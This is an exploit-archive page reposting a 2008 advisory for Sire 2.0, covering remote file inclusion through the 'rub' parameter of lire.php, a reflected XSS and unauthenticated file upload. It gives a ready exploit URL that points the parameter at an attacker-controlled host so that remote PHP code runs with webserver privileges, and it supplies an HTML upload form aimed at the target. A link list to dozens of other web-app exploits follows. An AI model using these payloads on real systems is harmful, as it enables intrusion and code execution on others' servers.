Full-TR - Sire 2.0 (lire.php) Remote File Inclusion/Arbitary File Upload Vulnerability

Exploit / Web Apps Exploit / Sire 2.0 (lire.php) Remote File Inclusion/Arbitary File Upload Vulnerability

Eklenme Tarihi: 2008-10-20 23:05

[+]File Inclusion:
Input passed to the "rub" parameter in "lire.php" isn't properly verified,
before it is used to include remote files
Successful exploitation requires that "register_globals" is enabled.

[lire.php code]
<?
73 if(empty($_GET["rub"])){$rub=rtrim($rubriques[0]);} else {$rub=$_GET["rub"];}
75 include($rub."/compter.php"); ## File Inclusion !!

298 echo $rub; ## XSS
?>

[+]Exploit: Exploit [url]http://[trajet]/lire.php?rub=http://[attacker]&cahier=1&art=1[/url]
[+]http://[attacker]/compter.php Will be Included And Executed withe the privilege of the webserver

File Upload
Remote User can Upload jpg,jpeg,gif,bmp files without Identification ,
[upload.php code:]
<?
if( isset($_POST['upload']) ) // si formulaire soumis
{
#Upload code ....
}
?>
Exploit :

<form enctype="multipart/form-data" method="post" action="http://Trajet/upload.php?">
Download File<br>
<input name="fichier" type="file" size="48"><br>
<input type="submit" name="upload" value="uploader"><form>

[Moroccan Security Team]

contact:
simo64[at]gmail[dot]com

Yorumlar:

Hen�z Yorum Eklenmedi

Yorum Ekle

Keywords:

Benzer Sayfalar (Similar Pages):

Bulunamad�. (not found)

Bu Sayfalarda �lginizi �ekebilir (The Links Bellow May Attract You As Well):

Exploit / Web Apps Exploit / WordPress Blog HTTP Splitting Vulnerability
Exploit / Web Apps Exploit / Turbo Seek Null Byte Error Discloses Files to Remote Users
Exploit / Web Apps Exploit / PHP-Nuke 7.4 Remote Privilege Escalation
Exploit / Web Apps Exploit / AWStats Input Validation Hole in 'logfile'
Exploit / Web Apps Exploit / PHP-NUKE version <= 6.9 'cid' sql injection Remote Exploit
Exploit / Web Apps Exploit / phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit
Exploit / Web Apps Exploit / sendtemp.pl Read Access to Files
Exploit / Web Apps Exploit / Fastgraf's whois.cgi Remote Command Execution Exploit
Exploit / Web Apps Exploit / PostNuke PostWrap Module Remote Exploit
Exploit / Web Apps Exploit / Siteman <= 1.1.10 Remote Administrative Account Addition Exploit
Exploit / Web Apps Exploit / AWStats configdir Remote Command Execution Exploit (perl code)
Exploit / Web Apps Exploit / QWikiwiki Directory Traversal Vulnerability
Exploit / Web Apps Exploit / PhpInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion
Exploit / Web Apps Exploit / e107 include() Remote Exploit
Exploit / Web Apps Exploit / phpMyChat 0.14.5 Remote Improper File Permissions Exploit
Exploit / Web Apps Exploit / phpBB highlight Arbitrary File Upload (Santy.A)
Exploit / Web Apps Exploit / phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)
Exploit / Web Apps Exploit / phpBB <= 2.0.10 Remote Command Execution Exploit
Exploit / Web Apps Exploit / GFHost PHP GMail Remote Command Execution Exploit
Exploit / Web Apps Exploit / TWiki 20030201 search.pm Remote Command Execution Exploit
Exploit / Web Apps Exploit / vBulletin LAST.PHP SQL Injection Vulnerability
Exploit / Web Apps Exploit / ocPortal 1.0.3 Remote File Inclusion
Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution (new version2)
Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution (new version)
Exploit / Web Apps Exploit / PHP-Nuke 6.x - 7.6 Top module Remote Sql Injection Exploit (working)
Exploit / Web Apps Exploit / phpBB <= 2.0.13 'Calendar Pro' mod Remote Exploit
Exploit / Web Apps Exploit / phpBB <= 2.0.13 'downloads.php' mod Remote Exploit
Exploit / Web Apps Exploit / ZPanel <= 2.5 Remote SQL Injection Exploit
Exploit / Web Apps Exploit / phpDEV5 Remote Default Insecure Users Vuln
Exploit / Web Apps Exploit / SocialMPN Arbitrary File Injection Exploit